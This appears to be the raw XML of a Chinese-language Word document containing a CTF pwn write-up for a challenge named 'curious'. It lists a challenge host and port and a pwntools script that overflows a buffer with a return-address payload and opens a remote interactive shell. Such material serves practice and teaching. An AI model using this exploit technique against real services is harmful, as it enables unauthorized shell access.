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Pwn+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>curious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你根本不知道我想要的是什么！</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>182.92.237.102:10031</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="333057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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5264785" cy="3298190"/>
            <wp:effectExtent l="0" t="0" r="825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直接缓冲区溢出</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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from pwn import 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Set context for logging and architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>context(log_level="debug", arch="amd64", os="linux")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Connect to remote server</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>io = remote("182.92.237.102", 10031)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Load ELF binary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>elf = ELF('./curious')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Interact with the binary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>io.send(b'oh1yes')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>io.sendline(b'/bin/sh\x00')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Create and send payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>payload = b'a' * 0x28 + p64(0x40101a) + p64(0x401FF5)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>io.sendline(payload)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Interact with the shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>io.interactive()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32A372F0"/>
    <w:rsid w:val="48E8561E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</Words>
  <Characters>64</Characters>
  <Lines>1</Lines>
  <Paragraphs>1</Paragraphs>
  <TotalTime>3</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>66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2024-05-22T11:33:48Z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